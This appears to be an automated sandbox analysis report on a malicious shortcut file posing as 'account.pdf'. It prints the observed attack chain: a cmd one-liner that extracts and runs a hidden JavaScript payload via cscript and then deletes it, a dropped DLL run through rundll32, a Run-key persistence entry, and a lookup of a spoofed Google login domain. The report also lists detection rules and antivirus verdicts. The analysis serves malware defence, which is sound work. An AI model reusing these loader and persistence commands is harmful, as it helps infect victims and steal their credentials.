Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 8, 2023, 2:35 p.m. | Sept. 8, 2023, 2:37 p.m. |
Process | PID | Command line |
---|---|---|
cmd.exe | 2564 | "C:\Windows\System32\cmd.exe" /c start /wait "dwgenGeAk" C:\Users\test22\AppData\Local\Temp\account.pdf.lnk |
cmd.exe | 2676 | "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls |
cmd.exe | 2768 | C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk |
findstr.exe | 2824 | findstr /b "var onm=" "C:\Users\test22\AppData\Local\Temp\account.pdf.lnk" |
chrome.exe | 1152 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "C:\Users\test22\AppData\Local\Temp\account.pdf" |
chrome.exe | 2108 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef445f1e8,0x7fef445f1f8,0x7fef445f208 |
chrome.exe | 2188 | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=940 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 |
cmd.exe | 3016 | "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y |
cmd.exe | 2548 | cmd /c start rundll32.exe MSADOCG.DLL,DllUnregisterServer |
cmd.exe | 2808 | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
Name | Response | Post-Analysis Lookup |
---|---|---|
login.drive-google-com.tk | 103.108.67.191 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Application Cache\Index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Top Sites |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Preferences |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-journal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Policy\User Policy |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\89764e1f-463b-4e96-846c-9ed5d71183c2.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Application Cache\Cache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Managed Mode Settings |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\verified_contents.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\README |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-wal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\1152-1694151328140625.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\verified_contents.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Visited Links |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\File System\primary.origin |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-64FAD828-480.pma |
file | C:\Users\test22\AppData\Local\Temp\account.pdf |
file | C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
file | C:\Users\test22\AppData\Local\Temp\MSADOCG.DLL |
file | C:\Users\test22\AppData\Local\Temp\*.lnk |
file | C:\Users\test22\AppData\Local\Temp\account.pdf.lnk |
cmdline | C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
cmdline | "C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf |
cmdline | "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y |
cmdline | "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls |
cmdline | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
file | C:\Users\test22\AppData\Local\Temp\MSADOCG.DLL |
url | https://crashpad.chromium.org/bug/new |
url | https://crashpad.chromium.org/ |
url | http://dts.search-results.com/sr?lng= |
url | http://creativecommons.org/ns |
url | https://qc.search.yahoo.com/search?ei= |
url | http://crbug.com/122474. |
url | https://search.yahoo.com/search?ei= |
url | http://crbug.com/31395. |
url | https://support.google.com/chrome/answer/165139 |
url | https://ct.googleapis.com/aviator/ |
url | https://ct.startssl.com/ |
url | https://suggest.yandex.com.tr/suggest-ff.cgi?part= |
url | https://drive-daily-5.corp.google.com/ |
url | https://github.com/GoogleChrome/Lighthouse/issues |
url | http://www.searchnu.com/favicon.ico |
url | https://support.google.com/installer/?product= |
url | https://www.najdi.si/search.jsp?q= |
url | https://accounts.google.com/ServiceLogin |
url | https://accounts.google.com/OAuthLogin |
url | https://search.goo.ne.jp/sgt.jsp?MT= |
url | https://www.google.com/tools/feedback/chrome/__submit |
url | https://suggest.yandex.by/suggest-ff.cgi?part= |
url | http://feed.snap.do/?q= |
url | https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico |
url | http://developer.chrome.com/apps/declare_permissions.html |
url | https://ct.googleapis.com/rocketeer/ |
url | https://se.search.yahoo.com/search?ei= |
url | https://developers.google.com/web/fundamentals/accessibility/accessible-styles |
url | https://mammoth.ct.comodo.com/ |
url | http://hladaj.atlas.sk/fulltext/?phrase= |
url | http://buscador.softonic.com/?q= |
url | https://hk.search.yahoo.com/sugg/chrome?output=fxjson |
url | https://ph.search.yahoo.com/sugg/chrome?output=fxjson |
url | https://ro.search.yahoo.com/favicon.ico |
url | https://kvasir.no/grafikk/favicon.ico |
url | https://codereview.chromium.org/25305002). |
url | https://ve.search.yahoo.com/sugg/chrome?output=fxjson |
url | http://search.conduit.com/Results.aspx?q= |
url | https://ct.googleapis.com/logs/argon2018/ |
url | https://developers.google.com/web/tools/lighthouse/ |
url | https://support.google.com/chrome/answer/185277 |
url | https://nz.search.yahoo.com/sugg/chrome?output=fxjson |
url | https://github.com/bgrins/spectrum |
url | http://crbug.com/642141 |
url | http://code.google.com/p/chromium/issues/entry |
url | https://www.google.com/favicon.ico |
url | https://suggest.yandex.kz/suggest-ff.cgi?part= |
url | https://www.yandex.kz/chrome/newtab |
url | http://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager07.htmlhttp://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager02.htmlhttp://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager06.htmlhttps://support.google.com/chrome/answer/118142065782681https://support.google.com/chrome/?p=settings_clear_browsing_datahttps://history.google.com/history/?utm_source=chrome_cbdhttps://myactivity.google.com/myactivity/?utm_source=chrome_nhttps://myactivity.google.com/myactivity/?utm_source=chrome_hChrome |
url | http://dev.w3.org/csswg/css3-transitions/ |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | Checks if being debugged | rule | anti_dbg |
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert |
description | Bypass DEP | rule | disable_dep |
description | Create a windows service | rule | Create_Service |
description | Client_SW_User_Data_Stealer | rule | Client_SW_User_Data_Stealer |
description | Communications over RAW Socket | rule | Network_TCP_Socket |
description | Communications over P2P network | rule | Network_P2P_Win |
description | Communication using DGA | rule | Network_DGA |
description | browser info stealer | rule | infoStealer_browser_Zero |
description | Steal credential | rule | local_credential_Steal |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | Escalate privileges | rule | Escalate_priviledges |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Record Audio | rule | Sniff_Audio |
description | Communications over HTTP | rule | Network_HTTP |
description | Communications use DNS | rule | Network_DNS |
description | Take ScreenShot | rule | ScreenShot |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | Match Windows Inet API call | rule | Str_Win32_Internet_API |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerCheck__RemoteAPI |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__ConsoleCtrl |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | (no description) | rule | Check_Dlls |
description | Possibly employs anti-virtualization techniques | rule | vmdetect |
description | Checks if being debugged | rule | anti_dbg |
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert |
description | Bypass DEP | rule | disable_dep |
description | Affect hook table | rule | win_hook |
description | Google Chrome User Data Check | rule | Chrome_User_Data_Check_Zero |
description | Install itself for autorun at Windows startup | rule | Persistence |
description | Communications over FTP | rule | Network_FTP |
description | Run a KeyLogger | rule | KeyLogger |
description | File Downloader | rule | Network_Downloader |
description | Create a windows service | rule | Create_Service |
cmdline | C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk |
cmdline | cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
cmdline | "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls |
cmdline | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE | reg_value | cmd /c start C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
file | C:\Users\test22\AppData\Local\Temp\account.pdf |
parent_process | cscript.exe | martian_process | cmd /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y |
parent_process | cscript.exe | martian_process | cmd /c start C:\Users\test22\AppData\Local\Temp\account.pdf |
parent_process | cscript.exe | martian_process | cmd /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
parent_process | cscript.exe | martian_process | cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef445f1e8,0x7fef445f1f8,0x7fef445f208 |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1252,1068463943848656389,9381778915884664680,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=815552CDE72A5D7590704E1C828ACECF --mojo-platform-channel-handle=1268 --ignored=" --type=renderer " /prefetch:2 |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=940 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 |
parent_process | cscript.exe | martian_process | cmd /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y |
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
parent_process | cscript.exe | martian_process | cmd /c start C:\Users\test22\AppData\Local\Temp\account.pdf |
parent_process | cscript.exe | martian_process | cmd /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat |
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf |
parent_process | cscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y |
parent_process | cscript.exe | martian_process | cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js |
url | http://127.0.0.1 |
Antivirus engine | Detection |
---|---|
MicroWorld-eScan | Trojan.LNK.Droid.2.Gen |
FireEye | Trojan.LNK.Droid.2.Gen |
Arcabit | Trojan.LNK.Droid.2.Gen [many] |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Trojan.LNK.Droid.2.Gen |
Emsisoft | Trojan.LNK.Droid.2.Gen (B) |
F-Secure | Trojan-Dropper:W32/Janicab.A |
VIPRE | Trojan.LNK.Droid.2.Gen |
TrendMicro | HEUR_LNKEXEC.A |
McAfee-GW-Edition | BehavesLike.Trojan.dl |
Sophos | Mal/LnkDrop-A |
Microsoft | Trojan:Script/Sabsik.FL.A!ml |
ZoneAlarm | HEUR:Trojan.WinLNK.Agent.gen |
GData | Trojan.LNK.Droid.2.Gen |
Detected | |
VBA32 | Trojan.Link.Crafted |
ALYac | GT:JS.Backdoor.2.0B1CE076 |
MAX | malware (ai score=88) |
Zoner | Probably Heur.LNKScript |
SentinelOne | Static AI - Suspicious LNK |
Panda | Trj/Ghostcript.A |